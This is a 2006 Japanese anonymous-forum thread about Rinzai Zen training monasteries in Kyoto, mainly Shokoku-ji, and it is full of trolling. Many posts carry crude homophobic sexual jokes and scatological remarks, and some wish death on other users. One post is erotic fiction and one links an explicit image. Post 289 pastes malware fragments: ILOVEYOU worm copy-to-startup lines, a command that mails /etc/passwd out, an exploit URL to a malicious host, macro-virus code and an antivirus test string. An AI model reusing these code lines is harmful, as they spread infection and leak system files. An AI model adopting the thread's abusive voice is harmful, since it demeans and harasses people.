199 :名無しさん@京都板じゃないよ:2006/07/24(月) 11:30:53
★【臨済宗】★愛の営み夫婦生活★【寺庭婦人】★できたよ

200 :名無しさん@京都板じゃないよ:2006/07/24(月) 17:07:23
花大は、宗門の中でも「鼻くそ大学」大学と言われています。
鼻大を出て住職になってもいじめられるだけです。




201 :名無しさん@京都板じゃないよ:2006/07/24(月) 17:15:21
>>198
10人くらいと聞いたよ。
雲水が多い僧堂より、こういう少人数の僧堂が良いね。

202 :名無しさん@京都板じゃないよ:2006/07/24(月) 17:18:36
暴力禁止の相國僧堂なら、「京叢林で、修行しました!!」って自慢できるし、少人数制で醜い苛めも無いし、かなり良いんじゃねえ!?

203 :名無しさん@京都板じゃないよ:2006/07/24(月) 17:23:11
>>201
最低15人くらはいないと、役寮分担が難しいだろ。

堂内には誰もいなくなり、直日だけが虚空に向かって
大声を張り上げ、警策を打つ日々ぞ。

204 :名無しさん@京都板じゃないよ:2006/07/24(月) 17:24:20
雲水の多い僧堂は、苛めが激しそうだね(*o*)

205 :名無しさん@京都板じゃないよ:2006/07/24(月) 17:26:39
雲水の多い僧堂には行きたくないm(_)m

206 :名無しさん@京都板じゃないよ:2006/07/24(月) 17:29:45
10人おれば、十分じゃよ。

207 :名無しさん@京都板じゃないよ:2006/07/24(月) 17:29:55
小人数だからきびしいゾ


208 :名無しさん@京都板じゃないよ:2006/07/24(月) 17:30:26
よう釣れまっせー

本日大漁!

209 :名無しさん@京都板じゃないよ:2006/07/24(月) 17:36:08
雲水が少なければ、飯作りも楽そうだ。

210 :名無しさん@京都板じゃないよ:2006/07/24(月) 17:38:42
>>207
嘘つくな。

211 :名無しさん@京都板じゃないよ:2006/07/24(月) 17:45:37
暴力禁止・健康第一・少人数制の相國僧堂に行きます(^o^)

212 :名無しさん@京都板じゃないよ:2006/07/24(月) 17:48:37
互いの糞まで食えるほどの真の師弟愛が生きている相国僧堂に行きます。

213 :名無しさん@京都板じゃないよ:2006/07/24(月) 17:48:57
>>203
直日が誰も居ない禅堂で一人で叫んで警策振り回してるなんて・・・(*o*)・・・狂ってる(*o*)

214 :名無しさん@京都板じゃないよ:2006/07/24(月) 17:51:30
そんな狂ってるのが小国僧堂\(^_^)/

215 :名無しさん@京都板じゃないよ:2006/07/24(月) 17:52:01
雲水が多い僧堂は、苛めも激しいだろうよ(^_^;

216 :名無しさん@京都板じゃないよ:2006/07/24(月) 17:54:04
相國僧堂に行こうおっと(^_^)

217 :名無しさん@京都板じゃないよ:2006/07/24(月) 17:56:10
直日が一人で禅堂に坐っているのも面白いねえ(^_-)

218 :名無しさん@京都板じゃないよ:2006/07/24(月) 17:57:27
相國僧堂は居士さんが多いそうですよ(^_^)

219 :名無しさん@京都板じゃないよ:2006/07/24(月) 17:58:36
居士さんが居るのに暴力なんか振るえるわけないわさ(^_^;

220 :名無しさん@京都板じゃないよ:2006/07/24(月) 18:00:16
居士さんの前では、みんな大人しいね(@_@)

221 :名無しさん@京都板じゃないよ:2006/07/24(月) 18:02:25
相國僧堂は雲水さんよりも居士さんの方が遥かに多いそうだね(@_@)

222 :名無しさん@京都板じゃないよ:2006/07/24(月) 18:04:17
相國僧堂は、本山のホームページで居士さんを募集してるよ。

223 :名無しさん@京都板じゃないよ:2006/07/24(月) 18:05:57
ますます相國に行きたくなった。居士さんが多いと楽しそうだ!!

224 :名無しさん@京都板じゃないよ:2006/07/24(月) 18:11:46
笑国痔

225 :名無しさん@京都板じゃないよ:2006/07/24(月) 18:14:57
相國!!愉しそう!!

226 :名無しさん@京都板じゃないよ:2006/07/24(月) 18:29:00
相国寺は他にももっといいところあるだろう?
いってごらん。全部いってごらん。たのしいぞ。

227 :名無しさん@京都板じゃないよ:2006/07/24(月) 18:31:21
>>226
おまえが言えよ。

228 :名無しさん@京都板じゃないよ:2006/07/24(月) 18:33:22
わしも相國に行くぞ!!

229 :名無しさん@京都板じゃないよ:2006/07/24(月) 18:39:52
小国僧堂は閉単し、小国居士林になったってことか?

230 :名無しさん@京都板じゃないよ:2006/07/24(月) 18:51:13
>>229
相國僧堂は人気が有るから閉単しねえよ。

231 :名無しさん@京都板じゃないよ:2006/07/24(月) 18:52:55
相国僧堂でみんな愉しくホモろう!!

232 :名無しさん@京都板じゃないよ:2006/07/24(月) 18:53:15
>>229
智勝会が有るだろ。

233 :名無しさん@京都板じゃないよ:2006/07/24(月) 18:54:31
相國僧堂は、雲水単と居士単と和尚単が有る大規模な禅堂だろ?

234 :名無しさん@京都板じゃないよ:2006/07/24(月) 18:57:05
毎年、新到が多数入っても、高単が多数出ていくから、増えねえんだろ。

235 :名無しさん@京都板じゃないよ:2006/07/24(月) 19:03:27
同夏だらけ。

236 :名無しさん@京都板じゃないよ:2006/07/24(月) 19:16:35
器の単だけ大規模な小国僧堂
大小のいい文句だ。


237 :名無しさん@京都板じゃないよ:2006/07/24(月) 19:17:14
私も、オトコ同士が真の愛の絆=直腸で結ばれた相国僧堂を選びました!!

238 :名無しさん@京都板じゃないよ:2006/07/24(月) 19:19:26
>>237
僧堂での同性愛は禁止します!!

239 :名無しさん@京都板じゃないよ:2006/07/24(月) 19:20:40
京都のド真ん中なんだから男に走る必要は無いだろ。

240 :名無しさん@京都板じゃないよ:2006/07/24(月) 19:21:36
京叢林に、ホモは、いねえよ。

241 :名無しさん@京都板じゃないよ:2006/07/24(月) 19:23:18
僧堂でのホモ行為なんて時代遅れだぜ!!

242 :名無しさん@京都板じゃないよ:2006/07/24(月) 19:25:07
京都には風俗がたくさん有るよ。

243 :名無しさん@京都板じゃないよ:2006/07/24(月) 19:27:03
僧堂でホモる必要無し!!

244 :名無しさん@京都板じゃないよ:2006/07/24(月) 19:28:34
わざわざ新到を犯すぐらいなら夜行するわ!!ぼけえ!!

245 :名無しさん@京都板じゃないよ:2006/07/24(月) 19:32:05
それでも新到のカワイイ尻の魅力にはさからえんよ。
直腸に突入したくなる!

246 :名無しさん@京都板じゃないよ:2006/07/24(月) 19:34:16
>>237
時代遅れな戯言ほざいてんじゃねえぞ!!ぼけえ!!

247 :名無しさん@京都板じゃないよ:2006/07/24(月) 19:34:30
百嬉夜行!うら若き青年嬉び組とめくるめく官能の世界。
100人の若僧と契りを結んだ時、何かが起こる。

248 :名無しさん@京都板じゃないよ:2006/07/24(月) 19:35:13
キャーーーーー

249 :名無しさん@京都板じゃないよ:2006/07/24(月) 19:36:17
>>245
おまえ、キモいから死ねよ。


250 :名無しさん@京都板じゃないよ:2006/07/24(月) 19:39:04
僧堂でのホモ行為は、ねえよ。
おまえ、俗人だろ?

251 :名無しさん@京都板じゃないよ:2006/07/24(月) 19:39:52
行為の時に、きちんとゴムをつけて肛門に挿入する最低限のエチケット…それが守られているAIDSフリーな相国僧堂を選びました。

252 :名無しさん@京都板じゃないよ:2006/07/24(月) 19:41:22
これだから、僧堂に行った事の無い俗人の戯言には、困るんだよね。
僧堂では、性欲なんか無くなるぜ。


253 :名無しさん@京都板じゃないよ:2006/07/24(月) 19:42:20
小刻騒動でホモ行為が無い?
そりゃ、隠れてやってんだから、わかんねえよ。


254 :コタツ猫:2006/07/24(月) 19:44:05
今度は禅宗がターゲット?各宗派行堂ネガティブキャンペーンしているのは、
加行のない宗派か創価の工作員?

255 :名無しさん@京都板じゃないよ:2006/07/24(月) 19:44:15
いちいち、うっとおしい荒らし馬鹿だぜ。
人気を落としたいだけの馬鹿め。

256 :名無しさん@京都板じゃないよ:2006/07/24(月) 19:47:04
ホモ荒らし馬鹿は、お蛇さんと、お稲荷さんに、呪われて、死ぬ。

257 :名無しさん@京都板じゃないよ:2006/07/24(月) 19:49:29
相國寺の蛇神社と稲荷神社の神様が、ホモ荒らしを抹殺してくれるだろう。

258 :名無しさん@京都板じゃないよ:2006/07/24(月) 19:51:20
>>254
とりあえず、侮辱罪・名誉毀損罪で通報しときました。

259 :名無しさん@京都板じゃないよ:2006/07/24(月) 19:52:57
>>254
きっと、荒らし馬鹿は、2ちゃんねるなら身元がバレないと思ってるんだろうね(^_^)
協力して、通報しましょう!!

260 :コタツ猫:2006/07/24(月) 19:54:07
ネタが切れたら消えるでしょう。しかしお祭りをしたいみたいだけど・・釣りがいまいちだな

261 :名無しさん@京都板じゃないよ:2006/07/24(月) 19:54:49
>>258
一体幾つ通報したんだ?・・・できもしないくせに。。。
大風呂敷の大嘘もほどほどにしたら?基地外

侮辱罪・名誉毀損罪しか知らないんだろ?

マヌケ

>>259
>2ちゃんねるなら身元がバレないと思ってるんだろうね
はい、バレません。

262 :名無しさん@京都板じゃないよ:2006/07/24(月) 19:55:30
おい!!こらあ!!ホモ荒らし馬鹿!!身元が、バレねえと思ってんのかあ!!失せろ!!塵野郎!!

263 :名無しさん@京都板じゃないよ:2006/07/24(月) 19:57:45
>>261
おい!!素人!!ソフト使ったら解るんだよ!!馬鹿!!

264 :名無しさん@京都板じゃないよ:2006/07/24(月) 19:58:46
>>263
ソフトクリームか?wwww

265 :名無しさん@京都板じゃないよ:2006/07/24(月) 20:00:18
>>261
この、凡夫があ!!投稿追跡ハッキング技術も知らんのかあ!?

266 :名無しさん@京都板じゃないよ:2006/07/24(月) 20:04:24
嫁はアナル挿入での糞はなめてくれないが、昔、相国僧堂の彼はなめてくれた。

267 :名無しさん@京都板じゃないよ:2006/07/24(月) 20:05:04
>>265
おいおい、あんたのアドレスがホストコンピューターに残ってるぜ(^o^)

268 :名無しさん@京都板じゃないよ:2006/07/24(月) 20:17:18
ちんかす、なめあって、やっと禅僧になれる。

269 :名無しさん@京都板じゃないよ:2006/07/24(月) 20:20:17
臨済宗ってオゾマシイですね。

270 :名無しさん@京都板じゃないよ:2006/07/24(月) 20:48:07
冷静になってる場合か!
臨済各派スレ全部でホモ行為が暴露されてるんだぞ!
大空襲だ。20もあるスレが全部ホモ上げだ。一人の仕業とも思えん。

…真宗か?

271 :名無しさん@京都板じゃないよ:2006/07/24(月) 20:52:28
>>270
お前が他で暴れるからだ!
責任取れ!

272 :名無しさん@京都板じゃないよ:2006/07/24(月) 21:05:19
わかった。ホモ行為が臨済各派・各僧堂で日常的に行われていることは認める。だから、これ以上の内情暴露はやめてくれ。
おまえの要求は何だ?
新到の時に僧堂でケツを犯されたのなら、代わりに謝る。
頼む。おまえの要求を提示してくれ。可能なことなら、できるだけのことはする。

273 :名無しさん@京都板じゃないよ:2006/07/24(月) 21:46:21
要求ヲ伝エル。
ヲレモほもダ。妙派ニ属スル僧侶ダ。 無駄ナ争イハ望マナイ。
各スレ一人(基本的ニハ>>1)ヅツ、自分ノ尻ノ穴ノ画像ヲあっぷシロ。ソレガ見タイ。

274 :名無しさん@京都板じゃないよ:2006/07/24(月) 22:32:51

http://upload.wikimedia.org/wikipedia/commons/0/0c/Human_female_anus.jpeg

275 :名無しさん@京都板じゃないよ:2006/07/24(月) 23:03:24
よし!!みんなで消災呪を唱えるぞ!!いいな!!ほいっ!!

276 :名無しさん@京都板じゃないよ:2006/07/24(月) 23:43:50
【誘導】
乱立する臨済系スレッドを整理します。
ここは重複スレッドです。
連合各派・その他の話題はコチラへ↓

【臨済禅】臨済宗系総合スレッド【連合】第壱巻
http://travel2.2ch.net/test/read.cgi/kyoto/1153751658/

277 :名無しさん@京都板じゃないよ:2006/07/25(火) 10:56:29
そろそろ制間ですね(^_^)
僕は、暴力禁止・健康第一の相國僧堂に行きます(^_^)

278 :名無しさん@京都板じゃないよ:2006/07/25(火) 15:51:36
小國とホモどうにかしてくれ・

279 :名無しさん@京都板じゃないよ:2006/07/25(火) 18:11:42
ホモ野郎は、カルト教団の猛烈信者が犯人と思われる。大統領の総理が、相國寺派金閣寺を参拝したから嫉妬してんだろう。

280 :名無しさん@京都板じゃないよ:2006/07/25(火) 18:17:08
>>279
、荀ム、クカー、マチヤ「サ、タ、テ、ソ、、タ

281 :名無しさん@京都板じゃないよ:2006/07/25(火) 18:24:01
>>279
やっぱり原因は相國寺だったんだ。

282 :名無しさん@京都板じゃないよ:2006/07/25(火) 19:07:53
浣腸の家柄が委員で妬んでるんだろう。
ブッシュが来たくらいで妬まないだろう。

283 :名無しさん@京都板じゃないよ:2006/07/25(火) 20:21:48
早く立ち退いて綜合スレに行け。

284 :名無しさん@京都板じゃないよ:2006/07/25(火) 22:09:34
いろいろ言いながらおまえたち、昨晩は昔の熱い思い出に、尻のアナがジンジンうずいて眠れなかったくちだろw
…いいんだ、いいんだ、オレたち臨済僧はそうでなくっちゃ。

285 :名無しさん@京都板じゃないよ:2006/07/25(火) 22:38:25
また空襲だ! 曹洞の連中の目的は何なんだ!?

286 :名無しさん@京都板じゃないよ:2006/07/26(水) 08:27:36
臨済宗妙心寺派の僧侶は花園大学文学部国際禅学科卒の方が少なからず存在するとの事ですが、
大学進学率が50%を超える現在、「産近甲龍」(関西の中堅私立大学レベル)は卒業していたほうが良いと思われます。
提案ですが「インターネットで授業を受けられる」というメリットを生かして
【早稲田大学 人間科学部 eスクール】(http://e-school.human.waseda.ac.jp/)に入学しては如何でしょうか?
早稲田大学人間科学部の通信教育課程ではありますが、
(無事に卒業すれば)世間的な学歴は「早稲田大学卒」となります。
他大学通信教育課程と比較すると学費等が高額なのがネックの一つですが、
「早稲田大学卒」の圧倒的なブランドの前には大した問題ではないでしょう。
是非ご検討する事を推奨します。それでは用件のみにて失礼します。



287 :名無しさん@京都板じゃないよ:2006/07/26(水) 20:02:36
学歴なんざ何の役にも立たん。
暗闇で本を読もうと、もがくのと同じだ。

288 :名無しさん@京都板じゃないよ:2006/07/26(水) 20:24:55
うんこ

289 :名無しさん@京都板じゃないよ:2006/07/29(土) 01:12:43
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)

<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"


290 :名無しさん@京都板じゃないよ:2006/07/31(月) 14:29:44
よお〜!!暴力禁止・健康第一の相國僧堂で精進するぞお〜!!

291 :名無しさん@京都板じゃないよ:2006/08/15(火) 14:39:43
此の頃、小國の宣伝すくないぞ。
もっとがんばらんか?」

292 :名無しさん@京都板じゃないよ:2006/08/16(水) 17:37:06
くだらない怪我等したくないし相國に行くよ。

293 :名無しさん@京都板じゃないよ:2006/08/16(水) 18:31:51
syoukoku
no
senndenn
mottogannbareyaboke
sine


294 :名無しさん@京都板じゃないよ:2006/08/16(水) 18:47:43
>>293
消えろ!!

295 :名無しさん@京都板じゃないよ:2006/08/16(水) 19:29:45
http://travel2.2ch.net/test/read.cgi/kyoto/1152448224/l50
中外日報と文化時報の板です。

296 :名無しさん@京都板じゃないよ:2006/08/17(木) 06:47:18
ちんこのしゅぎょうになりました

297 :名無しさん@京都板じゃないよ:2006/08/19(土) 16:30:36
あああああ〜〜〜〜〜!!!!!殴られるのは嫌だあああああ〜〜〜〜〜!!!!!お願いだから相國に行かせてくれえええええ〜〜〜〜〜!!!!!ちゃんと頑張るからあああああ〜〜〜〜〜!!!!!

298 :名無しさん@京都板じゃないよ:2006/08/19(土) 18:05:59
このごろ小國宣伝さぼりすぎ。
しんどいときこそがんばれ。ぼけ。

299 :名無しさん@京都板じゃないよ:2006/08/20(日) 07:41:35
宣伝じゃなくて実情の暴露だろ。

300 :名無しさん@京都板じゃないよ:2006/08/20(日) 08:53:37
後藤利法衣店ってどう?

301 :名無しさん@京都板じゃないよ:2006/08/20(日) 14:36:41
>>300
知らん。

302 :名無しさん@京都板じゃないよ:2006/08/20(日) 16:07:28
もう皆わかってるだろうから他スレでの宣伝はこれ以上しないでくれたら助かる。

303 :名無しさん@京都板じゃないよ:2006/08/20(日) 18:53:34
宣伝じゃなくて愚痴を聞いて欲しいんじゃろ。

304 :名無しさん@京都板じゃないよ:2006/08/21(月) 04:54:26
体体体●                       ●●●●●
体体体●                      ●頭頭頭頭●●
体体体●                    ●●頭頭頭頭頭頭●●●
体体体●              ●●●●茎●頭頭頭頭頭頭頭頭頭●●
体体体●       ●●●●●茎茎茎茎茎茎●頭頭頭頭頭頭頭頭頭●
体体体● ●●●●茎茎茎茎茎茎茎茎茎茎茎茎●頭頭頭頭頭頭頭頭●
体体体●●茎茎茎茎茎茎茎茎茎茎茎茎茎茎茎茎茎●頭頭頭頭頭頭●  我
体体体茎茎茎茎茎茎茎茎茎茎茎茎茎茎茎茎茎茎●●●●●●●●     慢
体体体体茎茎茎茎茎茎茎茎茎茎茎茎茎●●●●                我慢
体体体体茎茎茎茎茎茎茎茎茎●●●●                      慢我慢
体体体体茎茎茎茎茎●●●●                           我慢我慢
体体体体茎茎●●●          ヘ⌒ヽフ                        慢我慢我
体体体体茎茎●            ( ・ω・)<美奈子が2ゲット               慢我 体体体体袋袋●                    
体体体体袋袋袋●                   
体体体体袋袋袋袋● 



305 :名無しさん@京都板じゃないよ:2006/08/30(水) 10:08:02
やはり暴力禁止僧堂が一番良いじゃろうな。

306 :名無しさん@京都板じゃないよ:2006/08/30(水) 10:30:18
>>305
懲りないねぇw

307 :名無しさん@京都板じゃないよ:2006/08/30(水) 11:18:12
>>305
○○と書けずにイライラしてるだろうね。少しは学習機能が身に付いたか?(w

308 :名無しさん@京都板じゃないよ:2006/08/30(水) 18:29:09
世界一の僧堂を教えてください。

309 :名無しさん@京都板じゃないよ:2006/08/30(水) 19:23:16
>>308 またワンパターンな解答を導き&宣伝しようとしてる。

310 :名無しさん@京都板じゃないよ:2006/08/30(水) 20:05:49
「服を脱いで、全裸になりなさい」
命令口調に仕込まれた私の体は
一瞬にして暑くなり蜜を溢れさす。
彼の強い視線に愛撫されながら
身にまとっていた邪魔なものを取り払った。

「これが君への婚約首輪だよ」
そう言って皮のチョーカーが着けられた。
見ようによっては犬の首輪に見えるそれは
彼と私の契約の証‥‥

嬉しさに身を震わせながら、
私は、サインの代わりに、彼を口に含んだ。

311 :名無しさん@京都板じゃないよ:2006/08/30(水) 21:22:44
あほや

312 :名無しさん@京都板じゃないよ:2006/09/02(土) 16:08:51
僕が僧堂に望む条件は、経済力・暴力禁止・健康第一・京都の中心地・大本山などです。

313 :名無しさん@京都板じゃないよ:2006/09/02(土) 16:54:47
↑ここに書いて人におしつけるものでもなし。

314 :名無しさん@京都板じゃないよ:2006/09/02(土) 22:51:40
   ∩___∩         |
   | ノ\     ヽ        |
  /  ●゛  ● |        |
  | ∪  ( _●_) ミ       j
 彡、   |∪|   |        J>>308
/     ∩ノ ⊃  ヽ
(  \ / _ノ |  |
.\ “  /__|  |
  \ /___ /


315 :名無しさん@京都板じゃないよ:2006/09/05(火) 17:51:23
>>313
また被害妄想が来た。

316 :名無しさん@京都板じゃないよ:2006/09/05(火) 17:54:17
>>314
こういうバカげた絵を投稿する奴は2ちゃん依存症のオタク。気持ち悪い。

317 :名無しさん@京都板じゃないよ:2006/09/05(火) 18:38:45
上のほうでこのような↓変な声をあげているのはめちゃきしょい。

297 :名無しさん@京都板じゃないよ :2006/08/19(土) 16:30:36
あああああ〜〜〜〜〜!!!!!殴られるのは嫌だあああああ〜〜〜〜〜!!!!!お願いだから相國に行かせて
くれえええええ〜〜〜〜〜!!!!!ちゃんと頑張るからあああああ〜〜〜〜〜!!!!!

318 :名無しさん@京都板じゃないよ:2006/09/06(水) 07:44:38
僕が僧堂に望む条件は、経済力・暴力禁止・健康第一・京都の中心地・大本山などです。

319 :名無しさん@京都板じゃないよ:2006/09/06(水) 08:28:42
>>31
また被害妄想が来た。

320 :名無しさん@京都板じゃないよ:2006/09/06(水) 10:36:42
>>319
おまえだ。

321 :名無しさん@京都板じゃないよ:2006/09/06(水) 14:03:29
ちんこ

322 :名無しさん@京都板じゃないよ:2006/09/13(水) 13:44:33
坐禅と見性 四十五章  豊胸残味
http://life7.2ch.net/test/read.cgi/psy/1158077346/

323 :名無しさん@京都板じゃないよ:2006/09/15(金) 19:37:25
僧堂師家の田中老師について教えてください。

324 :名無しさん@京都板じゃないよ:2006/09/15(金) 20:14:29
>>323
雲水は勿論のこと居士も非常に大切にする老師様で人気が有る。智勝会も有名。在家出身。

325 :名無しさん@京都板じゃないよ:2006/09/15(金) 20:16:37
>>323
風貌は夢窓国師に似ている。

326 :名無しさん@京都板じゃないよ:2006/09/15(金) 23:16:20
>>324,325 さま

ありがとうございました。

327 :名無しさん@京都板じゃないよ:2006/09/15(金) 23:43:19
>>326さんへ
修行において大切なのは問題を外に向けるのではなく内に向ける事が非常に大切です。
これを忘れなければ何処の僧堂でもしっかりと修行できます。
僧堂や老師が自分には合わないというような雲水は己自究明していません。
お互い精進いたしましょう。

328 :名無しさん@京都板じゃないよ:2006/09/22(金) 07:05:10
僧堂に行くための衣とかを、後藤利法衣店で買おうと思うんですが、
良い買い方とかありますか?
また、他にいい店や情報有ればおしえてください。


329 :名無しさん@京都板じゃないよ:2006/09/22(金) 09:41:55
金閣寺・銀閣寺を末寺に持つ大寺院の相國寺で修行したいと僕は思うのだよ。

330 :名無しさん@京都板じゃないよ:2006/09/22(金) 11:32:05
金閣寺・銀閣寺を末寺に持つ大寺院の相國寺で修行したいと考えるのは
健康な成人男子として当然です。

331 :名無しさん@京都板じゃないよ:2006/09/24(日) 01:21:44
経済力!!暴力禁止!!健康第一!!京都のド真ん中!!

332 :名無しさん@京都板じゃないよ:2006/09/24(日) 07:16:08
恥ずかしくないぞ。
行きたくて当然だ。
健康な青年男子なら。

333 :名無しさん@京都板じゃないよ:2006/09/25(月) 13:11:55
夢窓国師!!最高!!有馬管長!!最高!!田中老師!!最高!!相國承天禅寺!!最高!!

334 :名無しさん@京都板じゃないよ:2006/09/28(木) 00:09:52
ここ、トロイの木馬が、仕込まれてるよね、削除したけど・・・

335 :名無しさん@京都板じゃないよ:2006/09/28(木) 00:10:24
坐禅と見性 四十五章  豊胸残味
http://life7.2ch.net/test/read.cgi/psy/1158077346/

336 :名無しさん@京都板じゃないよ:2006/10/03(火) 20:03:37
きっきっきっ。みんな騙されるなよ。京叢林は何処も凄まじく厳しいさ。

337 :名無しさん@京都板じゃないよ:2006/10/07(土) 22:35:56
鬼大拙の家風が吹く天下の鬼叢林。

338 :名無しさん@京都板じゃないよ:2006/10/08(日) 23:28:10
一位 平林寺
二位 正眼寺
三位 妙心寺
四位 徳源寺
五位 臨済寺

339 :名無しさん@京都板じゃないよ:2006/10/09(月) 00:04:51
銀閣寺の特別拝観はボッタクリだろう

340 :名無しさん@京都板じゃないよ:2006/10/11(水) 22:49:15
困難に出会って徳を持ち最も美しい光を放つ。

341 :名無しさん@京都板じゃないよ:2006/10/12(木) 21:31:33
ぎとぎとした悪徳の輝き

342 :名無しさん@京都板じゃないよ:2006/10/13(金) 09:49:13
楽だから雲水が多いのではなく老師に魅力が有るからである。

343 :名無しさん@京都板じゃないよ:2006/10/13(金) 09:50:21
根拠なし!

344 :名無しさん@京都板じゃないよ:2006/10/14(土) 17:08:41
試験

檀家の多い僧堂を一位から五位まで順に述べてみよ。

345 :名無しさん@京都板じゃないよ:2006/10/14(土) 17:42:10
無関係の関係。

346 :名無しさん@京都板じゃないよ:2006/10/18(水) 12:35:26
平林、正眼、妙心、徳源、臨済、・・・。何処に行こうかなあ・・・。

347 :ーバスター:2006/10/18(水) 13:48:00
論理性アル方、参加希望、信念馬鹿を打ちのめそう、、
http://life7.2ch.net/test/read.cgi/psy/1161087664/l50




348 :名無しさん@京都板じゃないよ:2006/10/22(日) 01:20:29
相國寺派の坊さんへ

他のスレで自分達の宗派の宣伝をしないでください。関係ない板違いな書き込みが多いですから。

例→暴力禁止・健康第一の相國僧堂で精進するぞ

など

349 :名無しさん@京都板じゃないよ:2006/10/22(日) 04:19:56
アッー!

350 :名無しさん@京都板じゃないよ:2006/10/22(日) 08:46:58
346 臨済寺いいよ

351 :名無しさん@京都板じゃないよ:2006/10/22(日) 08:49:28
アッー!アッー!アッー!アッー!アッー!アッー!アッー!アッー!アッー!アッー!

352 :名無しさん@京都板じゃないよ:2006/10/22(日) 23:42:24
>>348
時代遅れの苦言をほざくな。

353 :名無しさん@京都板じゃないよ:2006/10/22(日) 23:51:48
日本相撲協会 相國寺部屋

354 :名無しさん@京都板じゃないよ:2006/10/23(月) 09:06:59
花園大学 学長が老師を務めている臨済寺僧堂に行きたいですね。

355 :名無しさん@京都板じゃないよ:2006/10/23(月) 09:15:52
>>348
仕方ない 雲水は宣伝が好きなんだよ 許してやってくれw

356 :名無しさん@京都板じゃないよ:2006/10/28(土) 23:36:41
立正佼成会員の「すーとら」について議論しよう。

357 :名無しさん@京都板じゃないよ:2006/11/08(水) 17:18:24
立て看板 設置させてください、<(_"_)>ペコリ

『  ☆彡 目も見えず、耳も聞こえぬお人が、桜の木に抱きついている。

桜を、見たい、聞きたい。

さて、どうやって?

☆彡 坐禅と見性 四十六章 公案見性
http://life7.2ch.net/test/read.cgi/psy/1161444933/

二ではない(不二、ふに)、一の如し(一如、いちにょ)、それは、ほとけさま(さとり)のことです、どうですか、参禅していきませんか?
問う。
『 この場に坐したままで、30メートル先のローソクの炎を吹き消せ。 』
答える。
     ・・・と。

☆彡沢木興道老師のなぞなぞ?

アメリカに
「我が妻は我が父の母なり、我が父は我が子なり、我が妹は我が孫なり」
という言葉があったそうな。

‥‥……━★ 友好スレ
仙界の癒し大混浴場(バトルなし)
精神世界で癒される第15章
http://life7.2ch.net/test/read.cgi/healing/1156683671/


358 :名無しさん@京都板じゃないよ:2006/11/08(水) 23:19:03
くだらない仕来りに固執する京叢林に未来無し。

359 :名無しさん@京都板じゃないよ:2006/11/17(金) 00:41:13
怨みは怨みによって果たされず、忍を行じてのみ、よく怨みを解くことを得る。これ不変の真理なり。

法句経

360 :名無しさん@京都板じゃないよ:2006/11/17(金) 07:28:57
もう小國最高キャンペーンおわったの?

361 :名無しさん@京都板じゃないよ:2006/11/17(金) 12:52:09
制中だからね。

362 :名無しさん@京都板じゃないよ:2006/11/29(水) 19:56:37
今夜19:00から京都放送で、映画「雁の寺」が放送されるぜm(__)m

363 :名無しさん@京都板じゃないよ:2006/12/11(月) 23:17:19
【 狗子に仏性は、有るか? 】_

__            『   山川草木悉皆成仏   』    
  ||/ΛΛ/凹凹/∩∩/    ||  /     ___ ∧ ∧
  ||■■/目目/ΥΥ/|    ||/    /      (゚Д゚ ,,)   / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
  ||■/凸目/ΥΥ/  |    /     / 凹 Y/⊂  ヽ  <ねぇマスターお寺の門前に痩せのら狗がいマスター!
  ||/凸凵/ΠΠ/    |  /     /     ∧_∧(___,)〜 \______________________
  ||凸凵/▲▲/|    |/     /     (ω・  ) ┳┛
  ||凵/日日/  |   /     /  凹 Yと     l  ┃  / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
  ||/ΔΔ/ ∧_∧/     /   ∧_∧ i⌒,___) ┻ <生きとし生けるものには、ことごとく仏性が有るとか・・・
  ||廿廿/| ( ;´Д)    /     (∀・   )(_)┳┛    \_______________________
  ||廿/  | (.    つ   / 凹  Y と    l     ┃
  ||/    |  | 〇 .|  /     / i⌒ ,.__)   ┻/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
  ||      | (__(__)/     /  (_) ┳┛   <門前の痩せのら狗にも仏性があるのか,ないのかなぁ〜
  ||    /      /     /         ┃      \__________________________
  ||  /  ∧  /     /   ┏━┓  ┻
_||/   /   ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
      | 山川草木国土悉無仏性(ぜんうちゅうにぶっしょうはない)・・・仏性は無いに決まってんじゃん〜♪狗じゃん
      \____________________________________________


